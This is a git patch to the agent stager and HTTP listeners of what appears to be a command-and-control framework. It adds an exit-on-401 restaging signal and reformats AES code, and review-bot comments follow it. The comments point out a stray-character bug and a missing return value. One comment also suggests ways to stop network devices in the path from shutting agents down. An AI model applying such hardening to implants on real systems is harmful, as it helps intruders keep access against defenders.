From 4106db3279e546722d546e65098023644195eee5 Mon Sep 17 00:00:00 2001 From: xorrior Date: Tue, 24 Oct 2017 02:45:41 -0400 Subject: [PATCH] Fixed renegotation loop in stager --- data/agent/stagers/http.py | 22 ++++++++++++---------- lib/listeners/http.py | 4 ++++ lib/listeners/http_foreign.py | 4 +++- lib/listeners/http_hop.py | 4 +++- 4 files changed, 22 insertions(+), 12 deletions(-) diff --git a/data/agent/stagers/http.py b/data/agent/stagers/http.py index 0a06c5a..99b6de6 100644 --- a/data/agent/stagers/http.py +++ b/data/agent/stagers/http.py @@ -18,6 +18,8 @@ import socket import subprocess from binascii import hexlify + + LANGUAGE = { 'NONE' : 0, 'POWERSHELL' : 1, @@ -335,10 +337,10 @@ class AES(object): tt = tk[KC - 1] tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^ - (self.S[(tt >> 8) & 0xFF] << 16) ^ - (self.S[ tt & 0xFF] << 8) ^ - self.S[(tt >> 24) & 0xFF] ^ - (self.rcon[rconpointer] << 24)) + (self.S[(tt >> 8) & 0xFF] << 16) ^ + (self.S[ tt & 0xFF] << 8) ^ + self.S[(tt >> 24) & 0xFF] ^ + (self.rcon[rconpointer] << 24)) rconpointer += 1 if KC != 8: @@ -352,9 +354,9 @@ class AES(object): tt = tk[KC // 2 - 1] tk[KC // 2] ^= (self.S[ tt & 0xFF] ^ - (self.S[(tt >> 8) & 0xFF] << 8) ^ - (self.S[(tt >> 16) & 0xFF] << 16) ^ - (self.S[(tt >> 24) & 0xFF] << 24)) + (self.S[(tt >> 8) & 0xFF] << 8) ^ + (self.S[(tt >> 16) & 0xFF] << 16) ^ + (self.S[(tt >> 24) & 0xFF] << 24)) for i in xrange(KC // 2 + 1, KC): tk[i] ^= tk[i - 1] @@ -372,9 +374,9 @@ class AES(object): for j in xrange(0, 4): tt = self._Kd[r][j] self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^ - self.U2[(tt >> 16) & 0xFF] ^ - self.U3[(tt >> 8) & 0xFF] ^ - self.U4[ tt & 0xFF]) + self.U2[(tt >> 16) & 0xFF] ^ + self.U3[(tt >> 8) & 0xFF] ^ + self.U4[ tt & 0xFF]) def encrypt(self, plaintext): 'Encrypt a block of plain text using the AES block cipher.' diff --git a/lib/listeners/http.py b/lib/listeners/http.py index 9b9767d..01149a2 100644 --- a/lib/listeners/http.py +++ b/lib/listeners/http.py 
@@ -762,6 +762,10 @@ def send_message(packets=None):
     except urllib2.HTTPError as HTTPError:
         # if the server is reached, but returns an erro (like 404)
         missedCheckins = missedCheckins + 1
+        #if signaled for restaging, exit.
+        if HTTPError.code == 401:
+            sys.exit(0)
+
         return (HTTPError.code, '')
 
     except urllib2.URLError as URLerror:
diff --git a/lib/listeners/http_foreign.py b/lib/listeners/http_foreign.py
index a7ce61f..2aceb53 100644
--- a/lib/listeners/http_foreign.py
+++ b/lib/listeners/http_foreign.py
@@ -502,7 +502,9 @@ def send_message(packets=None):
     except urllib2.HTTPError as HTTPError:
         # if the server is reached, but returns an erro (like 404)
         missedCheckins = missedCheckins + 1
-        return (HTTPError.code, '')
+        r#if signaled for restaging, exit.
+        if HTTPError.code == 401:
+            sys.exit(0)
 
     except urllib2.URLError as URLerror:
         # if the server cannot be reached
diff --git a/lib/listeners/http_hop.py b/lib/listeners/http_hop.py
index f6d5044..16106f7 100644
--- a/lib/listeners/http_hop.py
+++ b/lib/listeners/http_hop.py
@@ -470,7 +470,9 @@ def send_message(packets=None):
     except urllib2.HTTPError as HTTPError:
         # if the server is reached, but returns an erro (like 404)
         missedCheckins = missedCheckins + 1
-        return (HTTPError.code, '')
+        #if signaled for restaging, exit.
+        if HTTPError.code == 401:
+            sys.exit(0)
 
     except urllib2.URLError as URLerror:
         # if the server cannot be reached
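Review bot: The added `if HTTPError.code == 401: sys.exit(0)` makes the agent terminate on an unauthenticated signal: a 401 can be produced by a proxy, WAF, captive portal or misconfigured web server sitting in front of the listener just as easily as by the listener itself, so anything in the path can kill every agent with a single status code, and the `missedCheckins` tolerance that the other error paths rely on is bypassed entirely. If the listener really does answer 401 to request re-staging, consider gating the exit on something only the listener can produce (for example a value in the 401 body that the agent can check against what it established at staging) or at least on several consecutive 401s rather than the first one; `sys` also has to be in scope in the agent code, which this hunk does not show. Style-wise, PEP 8 wants a space after the hash: `# if signaled for restaging, exit.`. `send_message` starts before this hunk and its body continues after it.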
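Review bot: The non-401 path of the `HTTPError` handler is left without a return value: `return (HTTPError.code, '')` is deleted and nothing replaces it, so any other HTTP error now falls out of the `except` and `send_message` returns `None` where the removed line produced a `(code, body)` tuple, unlike the sibling hunk in lib/listeners/http.py which kept the return. The new comment line `r#if signaled for restaging, exit.` also carries a stray `r` before the `#`; Python parses that as a bare expression statement naming `r`, which raises `NameError` on every HTTP error unless some `r` happens to be bound in that scope. Fix both by writing `# if signaled for restaging, exit.` and re-adding `return (HTTPError.code, '')` after the `if` block, mirroring http.py. The enclosing function starts before this hunk, so how callers treat a `None` return cannot be confirmed here.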
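Review bot: This handler no longer returns on non-401 errors: the hunk removes `return (HTTPError.code, '')` and adds only the 401 exit, so every other HTTP status now drops out of the `except` and `send_message` returns `None` instead of the `(code, body)` tuple the removed line produced; the equivalent change in lib/listeners/http.py kept that return, so the three listeners now disagree. Re-add `return (HTTPError.code, '')` directly after the `sys.exit(0)` line at the handler's indentation. The rest of `send_message` and its callers are outside this hunk, so whether a `None` return is tolerated downstream cannot be verified from here.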